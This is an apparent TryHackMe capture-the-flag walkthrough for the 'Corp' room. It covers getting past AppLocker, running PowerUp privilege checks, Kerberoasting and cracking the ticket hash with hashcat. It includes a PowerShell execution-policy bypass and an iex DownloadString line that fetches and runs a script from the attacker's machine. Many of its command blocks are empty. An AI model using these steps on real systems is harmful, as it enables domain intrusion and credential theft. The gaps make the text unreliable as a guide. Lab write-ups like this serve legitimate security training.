Corp

Room Link: https://tryhackme.com/room/corp

Bypassing Applocker

Load PowerUp.ps1 into memory.

Kali

wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
python2 -m SimpleHTTPServer 81

Add the following line at the bottom to PowerUp.ps1 so it Invokes all checks automatically once downloaded

PowerUp.ps1

Invoke-AllChecks

Victim(powershell)

powershell -ep bypass
iex​(New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1') 

Kali

Kali

Kerberoasting

Run the below command from the Administrator account we just got access to.

Victim(powershell)

Kali

Add the following line at the bottom to Invoke-Kerberoast.ps1 so it runs automatically once downloaded

Victim(powershell)

Run this to get rid of all the spaces.

Kali

Lets use hashcat to bruteforce this password. The type of hash we're cracking is Kerberos 5 TGS-REP etype 23 and the hashcat code for this is 13100.

Kali

Kali

Last updated